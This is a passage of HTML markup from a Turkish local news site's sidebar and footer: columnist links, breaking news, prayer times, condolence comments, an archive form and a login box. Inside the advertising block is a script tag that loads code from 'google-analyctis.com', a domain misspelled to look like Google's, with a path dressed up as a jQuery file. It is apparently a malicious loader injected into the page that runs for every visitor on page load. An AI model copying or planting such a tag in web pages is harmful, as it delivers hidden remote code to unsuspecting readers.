              <a href="https://www.elbistaninsesi.com/istanbul-makale,6519.html" title="İSTAN­BUL" >İSTAN­BUL</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/sukur-memur-emeklisine-makale,6517.html" title="Şükür memur emek­li­si­ne" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Yair_arYkan.jpg" alt="Şahin ARIKAN">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/78/sahin-arikan" title="Şahin ARIKAN">Şahin ARIKAN</a></h4>
              <a href="https://www.elbistaninsesi.com/sukur-memur-emeklisine-makale,6517.html" title="Şükür memur emek­li­si­ne" >Şükür memur emek­li­si­ne</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kis-boyle-olur-makale,6508.html" title="Kış böyle olur" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Nadir-Adbay_499_1.jpg" alt="Mehmet Ayaz">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/6/mehmet-ayaz" title="Mehmet Ayaz">Mehmet Ayaz</a></h4>
              <a href="https://www.elbistaninsesi.com/kis-boyle-olur-makale,6508.html" title="Kış böyle olur" >Kış böyle olur</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/muhterem-okurlarim-sayin-afsin-li-kardeslerim-makale,6506.html" title="MUHTEREM OKURLARIM, SAYIN AFŞİN&#039;Lİ KARDEŞLERİM:" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gocer_1.jpg" alt="Mehmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/4/mehmet-gocer" title="Mehmet Göçer">Mehmet Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/muhterem-okurlarim-sayin-afsin-li-kardeslerim-makale,6506.html" title="MUHTEREM OKURLARIM, SAYIN AFŞİN&#039;Lİ KARDEŞLERİM:" >MUHTEREM OKURLARIM, SAYIN AFŞİN&#039;Lİ KARDEŞLERİM:</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/zen-makale,6503.html" title="ZEN" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Prof._Dr._Mustafa_Necati_DaglY.jpg" alt="Prof. Dr. Mustafa Necati Daglı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/90/prof-dr-mustafa-necati-dagli" title="Prof. Dr. Mustafa Necati Daglı">Prof. Dr. Mustafa Necati Daglı</a></h4>
              <a href="https://www.elbistaninsesi.com/zen-makale,6503.html" title="ZEN" >ZEN</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/umudumuz-gencler-makale,6486.html" title="UMU­DU­MUZ GENÇ­LER" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/ceritli.jpg" alt="Celal Ceritli">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/95/celal-ceritli" title="Celal Ceritli">Celal Ceritli</a></h4>
              <a href="https://www.elbistaninsesi.com/umudumuz-gencler-makale,6486.html" title="UMU­DU­MUZ GENÇ­LER" >UMU­DU­MUZ GENÇ­LER</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/tez-gecti-makale,6467.html" title="TEZ GEÇTİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/11.jpg" alt="Nusret Yılmaz Külekçi">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/74/nusret-yilmaz-kulekci" title="Nusret Yılmaz Külekçi">Nusret Yılmaz Külekçi</a></h4>
              <a href="https://www.elbistaninsesi.com/tez-gecti-makale,6467.html" title="TEZ GEÇTİ" >TEZ GEÇTİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/koptu-gidiyor-makale,6464.html" title="KOPTU GİDİYOR" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Can-Ugur_919_1.jpg" alt="Can Uğur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/17/can-ugur" title="Can Uğur">Can Uğur</a></h4>
              <a href="https://www.elbistaninsesi.com/koptu-gidiyor-makale,6464.html" title="KOPTU GİDİYOR" >KOPTU GİDİYOR</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/asimin-nesli-milli-sairimizin-adeta-kizil-elmasidir-makale,6458.html" title="Asım’ın Nesli Milli Şairimizin adeta Kızıl elmasıdır…." >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/6faefd20-9b1e-418c-b102-3b2d1b2c5463.jpg" alt="Adnan YILMAZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/88/adnan-yilmaz" title="Adnan YILMAZ">Adnan YILMAZ</a></h4>
              <a href="https://www.elbistaninsesi.com/asimin-nesli-milli-sairimizin-adeta-kizil-elmasidir-makale,6458.html" title="Asım’ın Nesli Milli Şairimizin adeta Kızıl elmasıdır…." >Asım’ın Nesli Milli Şairimizin adeta Kızıl elmasıdır….</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/ahlakin-destek-ve-direnci-kac-makale,6418.html" title="Ahlakın destek ve direnci kaç?" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/vesikalYk_a_g.jpeg" alt="Ahmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/3/ahmet-gocer" title="Ahmet Göçer">Ahmet Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/ahlakin-destek-ve-direnci-kac-makale,6418.html" title="Ahlakın destek ve direnci kaç?" >Ahlakın destek ve direnci kaç?</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kaderi-insanlar-mi-yazar-yazilan-kaderi-mi-yasar-makale,6396.html" title="KADERİ İNSANLAR MI YAZAR, YAZILAN KADERİ Mİ YAŞAR ?" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/kitap1.jpg" alt="Sevda Küçük">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/62/sevda-kucuk" title="Sevda Küçük">Sevda Küçük</a></h4>
              <a href="https://www.elbistaninsesi.com/kaderi-insanlar-mi-yazar-yazilan-kaderi-mi-yasar-makale,6396.html" title="KADERİ İNSANLAR MI YAZAR, YAZILAN KADERİ Mİ YAŞAR ?" >KADERİ İNSANLAR MI YAZAR, YAZILAN KADERİ Mİ YAŞAR ?</a>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>

  
  <!-- SON DAKIKA VE OZEL HABER -->
  <div class="sonozeltab">

    <ul class="nav nav-tabs" id="sonozel">
      <li class="active"><a href="#sondakika" data-toggle="tab" class="sondakika">Son Dakika</a></li>      <li class=""><a href="#ozelhaber" data-toggle="tab" class="ozelhaber">Özel Haber</a></li>    </ul>

    <div class="tab-content">

            <div class="tab-pane active" id="sondakika">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="https://www.elbistaninsesi.com/guncel/ustune-catidan-kar-kutlesi-dusen-adam-hastanelik-oldu-h72632.html" title="Üstüne çatıdan kar kütlesi düşen adam hastanelik oldu" >Üstüne çatıdan kar kütlesi düşen adam hastanelik oldu</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/hz-hamza-cami-icin-hayirseverlerden-destek-talebi-h72569.html" title="Hz. Hamza Cami için hayırseverlerden destek talebi" >Hz. Hamza Cami için hayırseverlerden destek talebi</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/vefatlar/edibe-odacioglu-87-yasinda-h71859.html" title="Edibe Odacıoğlu 87 yaşında" >Edibe Odacıoğlu 87 yaşında</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/polisten-motosiklet-suruculerine-hayat-kurtaracak-hediye-h71612.html" title="Polisten motosiklet sürücülerine hayat kurtaracak hediye" >Polisten motosiklet sürücülerine hayat kurtaracak hediye</a></li>
          
          <li class="last"><a href="https://www.elbistaninsesi.com/guncel/kiraz-agaci-ekim-ayinda-cicek-acti-h71428.html" title="Kiraz ağacı ekim ayında çiçek açtı" >Kiraz ağacı ekim ayında çiçek açtı</a></li>
                  </ul>
      </div>
      
            <div class="tab-pane" id="ozelhaber">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="https://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEMin görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/vefatlar/durmus-ali-yavuz-80-yasinda-h37225.html" title="Durmuş Ali Yavuz 80 yaşında" >Durmuş Ali Yavuz 80 yaşında</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html" title="Pancardaki polar oranı, mahkemelik oldu" >Pancardaki polar oranı, mahkemelik oldu</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/boyle-saka-gorulmedi-h34847.html" title="Böyle şaka görülmedi!" >Böyle şaka görülmedi!</a></li>
          
          <li class="last"><a href="https://www.elbistaninsesi.com/guncel/eshab-i-kehf-kulliyesine-konaklama-tesisi-h34004.html" title="Eshab-ı Kehf Külliyesine konaklama tesisi" >Eshab-ı Kehf Külliyesi’ne konaklama tesisi</a></li>
                  </ul>
      </div>
      
    </div>
  </div>
  
<!-- NAMAZ VAKITLERI -->
  <div class="namazvakitleri">
    <div class="title">
      <h5>Namaz Vakitleri</h5>
      <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right">
                <option value="adana" >Adana</option>
                <option value="adiyaman" >Adıyaman</option>
                <option value="afyon" >Afyon</option>
                <option value="agri" >Ağrı</option>
                <option value="aksaray" >Aksaray</option>
                <option value="amasya" >Amasya</option>
                <option value="ankara" >Ankara</option>
                <option value="antalya" >Antalya</option>
                <option value="ardahan" >Ardahan</option>
                <option value="artvin" >Artvin</option>
                <option value="aydin" >Aydın</option>
                <option value="balikesir" >Balıkesir</option>
                <option value="bartin" >Bartın</option>
                <option value="batman" >Batman</option>
                <option value="bayburt" >Bayburt</option>
                <option value="bilecik" >Bilecik</option>
                <option value="bingol" >Bingöl</option>
                <option value="bitlis" >Bitlis</option>
                <option value="bolu" >Bolu</option>
                <option value="burdur" >Burdur</option>
                <option value="bursa" >Bursa</option>
                <option value="canakkale" >Çanakkale</option>
                <option value="cankiri" >Çankırı</option>
                <option value="corum" >Çorum</option>
                <option value="denizli" >Denizli</option>
                <option value="diyarbakir" >Diyarbakır</option>
                <option value="duzce" >Düzce</option>
                <option value="edirne" >Edirne</option>
                <option value="elazig" >Elazığ</option>
                <option value="erzincan" >Erzincan</option>
                <option value="erzurum" >Erzurum</option>
                <option value="eskisehir" >Eskişehir</option>
                <option value="gaziantep" >Gaziantep</option>
                <option value="giresun" >Giresun</option>
                <option value="gumushane" >Gümüşhane</option>
                <option value="hakkari" >Hakkari</option>
                <option value="hatay" >Hatay</option>
                <option value="igdir" >Iğdır</option>
                <option value="isparta" >Isparta</option>
                <option value="istanbul" >İstanbul</option>
                <option value="izmir" >İzmir</option>
                <option value="kahramanmaras" selected>Kahramanmaraş</option>
                <option value="karabuk" >Karabük</option>
                <option value="karaman" >Karaman</option>
                <option value="kars" >Kars</option>
                <option value="kastamonu" >Kastamonu</option>
                <option value="kayseri" >Kayseri</option>
                <option value="kirikkale" >Kırıkkale</option>
                <option value="kirklareli" >Kırklareli</option>
                <option value="kirsehir" >Kırşehir</option>
                <option value="kilis" >Kilis</option>
                <option value="izmit" >Kocaeli</option>
                <option value="konya" >Konya</option>
                <option value="kutahya" >Kütahya</option>
                <option value="malatya" >Malatya</option>
                <option value="manisa" >Manisa</option>
                <option value="mardin" >Mardin</option>
                <option value="mersin" >Mersin</option>
                <option value="mugla" >Muğla</option>
                <option value="mus" >Muş</option>
                <option value="nevsehir" >Nevşehir</option>
                <option value="nigde" >Niğde</option>
                <option value="ordu" >Ordu</option>
                <option value="osmaniye" >Osmaniye</option>
                <option value="rize" >Rize</option>
                <option value="adapazari" >Sakarya</option>
                <option value="samsun" >Samsun</option>
                <option value="siirt" >Siirt</option>
                <option value="sinop" >Sinop</option>
                <option value="sivas" >Sivas</option>
                <option value="sanliurfa" >Şanlıurfa</option>
                <option value="sirnak" >Şırnak</option>
                <option value="tekirdag" >Tekirdağ</option>
                <option value="tokat" >Tokat</option>
                <option value="trabzon" >Trabzon</option>
                <option value="tunceli" >Tunceli</option>
                <option value="usak" >Uşak</option>
                <option value="van" >Van</option>
                <option value="yalova" >Yalova</option>
                <option value="yozgat" >Yozgat</option>
                <option value="zonguldak" >Zonguldak</option>
              </select>
    </div>
      <div class="sonuc">

      <table cellspacing="0" cellpadding="0" id="vakitler">
          <tr>
            <th>İmsak</th>
            <th>Güneş</th>
            <th>Öğle</th>
            <th>İkindi</th>
            <th>Akşam</th>
            <th>Yatsı</th>
          </tr>
          <tr>
            <td>05:50</td>
            <td>07:10</td>
            <td>12:51</td>
            <td>15:53</td>
            <td>18:22</td>
            <td>19:37</td>
          </tr>
      </table>


      </div>

  </div>

  <div class="reklam reklam208"><iframe name=BIKADV src="https://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div>
  <!-- SON YORUMLAR -->
  <div class="son-yorumlar">
    <div class="header">
      <h5>Son Yorumlar</h5>
    </div>
    <div class="content">
      <ul class="unstyled hs-liste add-last">
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mikdat-gunes-71-yasinda-h72915.html#comment_373533" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mikdat-gunes-71-yasinda-h72915.html#comment_373532" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/yusuf-ayhan-91-yasinda-h72890.html#comment_373529" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mikdat-gunes-71-yasinda-h72915.html#comment_373528" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hasan-dogan-88-yasinda-h72903.html#comment_373527" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mikdat-gunes-71-yasinda-h72915.html#comment_373526" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mikdat-gunes-71-yasinda-h72915.html#comment_373525" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mikdat-gunes-71-yasinda-h72915.html#comment_373524" title="" >Cenab’ı Allah rahmet eylesin mekanı...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hasan-dogan-88-yasinda-h72903.html#comment_373523" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/seniha-daglioglu-yuksel-69-yasinda-h72888.html#comment_373522" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/haci-altun-82-yasinda-h72889.html#comment_373521" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/yusuf-ayhan-91-yasinda-h72890.html#comment_373520" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/anma-sonmez-dumlupinar-h72891.html#comment_373519" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hasan-dogan-88-yasinda-h72903.html#comment_373518" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mikdat-gunes-71-yasinda-h72915.html#comment_373517" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hasan-dogan-88-yasinda-h72903.html#comment_373516" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mikdat-gunes-71-yasinda-h72915.html#comment_373514" title="" >Halamın damadı Miktat Güneş öğretmenimizin...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mikdat-gunes-71-yasinda-h72915.html#comment_373513" title="" >Allah Rahmet Eylesin Mekanı Cennet Olsun.Ailesine...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mikdat-gunes-71-yasinda-h72915.html#comment_373512" title="" >Allah rahmet eylesin mekanı cennet kabri...</a></li>
                <li class="last"><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hasan-dogan-88-yasinda-h72903.html#comment_373511" title="" >ALLAH RAHMET EYLESİN MEKANİ CENNET OLSUN...</a></li>
              </ul>
    </div>
  </div>

  
<!-- ARSIV -->
<div class="arsiv">
  <div class="header">
    <h5>Arşiv</h5>
  </div>
  <div class="content">
    <form action="https://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" >
      <select name="gun" class="day span1">
                <option value="01" >01</option>
                <option value="02" >02</option>
                <option value="03" >03</option>
                <option value="04" >04</option>
                <option value="05" >05</option>
                <option value="06" >06</option>
                <option value="07" >07</option>
                <option value="08" >08</option>
                <option value="09" >09</option>
                <option value="10" >10</option>
                <option value="11" >11</option>
                <option value="12" >12</option>
                <option value="13" >13</option>
                <option value="14" >14</option>
                <option value="15" >15</option>
                <option value="16" >16</option>
                <option value="17" >17</option>
                <option value="18" >18</option>
                <option value="19" selected>19</option>
                <option value="20" >20</option>
                <option value="21" >21</option>
                <option value="22" >22</option>
                <option value="23" >23</option>
                <option value="24" >24</option>
                <option value="25" >25</option>
                <option value="26" >26</option>
                <option value="27" >27</option>
                <option value="28" >28</option>
                <option value="29" >29</option>
                <option value="30" >30</option>
                <option value="31" >31</option>
              </select>
      <select name="ay" class="month span1">
                <option value="01" >Ocak</option>
                <option value="02" selected>Şubat</option>
                <option value="03" >Mart</option>
                <option value="04" >Nisan</option>
                <option value="05" >Mayıs</option>
                <option value="06" >Haziran</option>
                <option value="07" >Temmuz</option>
                <option value="08" >Ağustos</option>
                <option value="09" >Eylül</option>
                <option value="10" >Ekim</option>
                <option value="11" >Kasım</option>
                <option value="12" >Aralık</option>
              </select>
      <select name="yil" class="year span1">
                <option value="2022" selected>2022</option>
                <option value="2021" >2021</option>
                <option value="2020" >2020</option>
                <option value="2019" >2019</option>
                <option value="2018" >2018</option>
              </select>
      <button type="submit" class="btn btn-default span1 pull-right">Ara</button>
    </form>
  </div>
</div>


  


        </div>
        
      </div>

        
                <!-- Sol Dikey Reklam -->
        <div class="reklam dikey sol" style="width:px;height:px;">

                                                                                                                                                                            </div>
        
        <!-- Sağ Dikey Reklam -->
        <div class="reklam dikey sag ortala" style="width:px;height:px;">

                                                                <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kaynarca -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-3633419220222736"
 data-ad-slot="5807534991"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
 (adsbygoogle = window.adsbygoogle || []).push({});
</script></p>
              
                                                                                                                                                                                                      </div>

        
      </div>

      <!-- FOOTER -->
<div id="siteFooter" class="footer">

      <div class="row-fluid">
      <div class="container center">
        <div class="span4">
          <div>Copyright © 2022 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div>
          <div class="footer-social">
            <a href="https://facebook.com/elbistaninsesi" rel="nofollow"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a>
            <a href="https://twitter.com/elbistaninsesi" rel="nofollow"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a>
            <a href="https://www.elbistaninsesi.com/rss"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a>
          </div>
        </div>
        <div class="span4 text-center">
          <div class="footer-logo"><a href="https://www.elbistaninsesi.com/" class="logo"><img src="https://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Fatik Arslan 89 yaşında" /></a></div>
        </div>
        <div class="span4">
          <p>&lt;center&gt;

0 (344) 415 04 15 &lt;br&gt;
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="a7c2cbc5ced4d3c6c9cec9d4c2d4cec0c6ddc2d3c2d4cee7c0cac6cecb89c4c8ca">[email&#160;protected]</a>
&lt;br&gt;Kızılcaoba Mah. Kışla Cad. 19/1&lt;/center&gt;

    </p>          <p><span class="site-info glyphicons earphone" style="padding-left: 0;"></span> 0 (344) 415 04 15</p>        </div>
      </div>
      </div>

      <div id="footer-alt" class="row-fluid">

        <div class="container center">

        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div>
        </div>

        </div>
      </div>



      <div class="row-fluid">
      <div class="container center">
        <div class="span12 text-center">
          <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p>         <a href="https://www.tebilisim.com/" target="_blank" title="haber sistemi, haber scripti, haber yazılımı, tebilişim"><p>Yazılım: TE Bilişim</p></a> 
        </div>
      </div>
      </div>

  <div id="top" class="btn btn-inverse">Yukarı Çık</div>
</div>
      <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
if (location.href.match(/\?.*/) && document.referrer) {
   location.href = location.href.replace(/\?.*/, '');
}
</script>
<div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="https://www.elbistaninsesi.com/index.php?m=login&amp;rd=https%3A%2F%2Fwww.elbistaninsesi.com%2Fvefatlar%2Ffatik-arslan-89-yasinda-h72918.html" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı Adı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı Adı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn hs-sdch btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="https://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="https://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a>
    <button class="btn hs-sdch btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>




<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/hs-paylas.min.js"></script><script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/system.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/text.js"></script>
<script type="text/javascript">

	new UISearch( document.getElementById( 'sb-search' ) );

	$(function(){
							});

		$("#comment_list .text").pKisalt();
	
		var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML,
	gsSpace   = ' ',
	gsUrl   = location.href;
	$("#paylas").jsSocials({
		url: location.href,
		text: gsTitle,
		showCount: true,
		showLabel: false,
		shares: [
			{ share: "twitter", via: "elbistaninsesi", hashtags: "Elbistanın Sesi" },
            { share: "whatsapp", text: "Bunu bilmelisin!"},
            "facebook",
            "linkedin",
            "pinterest",
			]
		});
							$('#haber > .page-header').waypoint(function(direction) {
		  $('#article-finished').toggleClass('hiding', direction === "up");
		}, {
		  offset: function() {
		    return $.waypoints('viewportHeight') - $(this).height() - 750;
		  }
		});
			var hasBeenClicked = false;
	var kisa_site_adi = "Elbistanın Sesi";
	var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com";

	$(document).on('copy', function(e){
		if ($(e.target).closest("#yorumlar,textarea,input").length) {
			hasBeenClicked = true;
		} else {
			hasBeenClicked = false;
		}
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
		
	
	
	
	
	


		tebilisim('72918', 'haber', '');
